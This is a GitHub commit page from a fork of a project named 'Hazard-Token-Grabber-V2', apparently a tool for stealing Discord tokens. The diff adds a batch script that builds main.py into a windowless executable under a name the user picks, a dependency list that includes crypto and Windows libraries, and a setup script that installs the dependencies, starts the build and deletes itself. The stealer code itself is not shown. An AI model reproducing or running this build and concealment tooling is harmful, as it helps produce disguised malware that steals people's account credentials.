forked from Rdimo/Hazard-Token-Grabber-V2
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Rdimo
committed
Dec 1, 2021
1 parent
8521666
commit 5393a39
Showing
6 changed files
with
101 additions
and
41 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
@echo off | ||
color 0a | ||
echo. | ||
set /p a="Enter the exe name : " | ||
if [%a%]==[] ( | ||
CALL:error | ||
pause | ||
EXIT /B | ||
) | ||
if [%a%] NEQ [] ( | ||
CALL:main | ||
EXIT /B 1 | ||
) | ||
ECHO is on | ||
:main | ||
echo. | ||
echo Name is: %a% | ||
pyinstaller --clean --onefile --noconsole -i NONE -n %a% main.py | ||
rmdir /s /q __pycache__ | ||
rmdir /s /q build | ||
del /f / s /q %a%.spec | ||
echo. | ||
echo generated exe as %a%.exe | ||
EXIT /B 1 | ||
ECHO is on | ||
:error | ||
echo. | ||
echo bro enter a name | ||
EXIT /B 1 |
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
requests | ||
psutil | ||
pypiwin32 | ||
pycryptodome | ||
pyinstaller | ||
pyautogui | ||
numpy | ||
pillow |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
python -m pip install -r requirements.txt | ||
cls | ||
start build-exe.bat | ||
start /b "" cmd /c del "%~f0"&exit /b |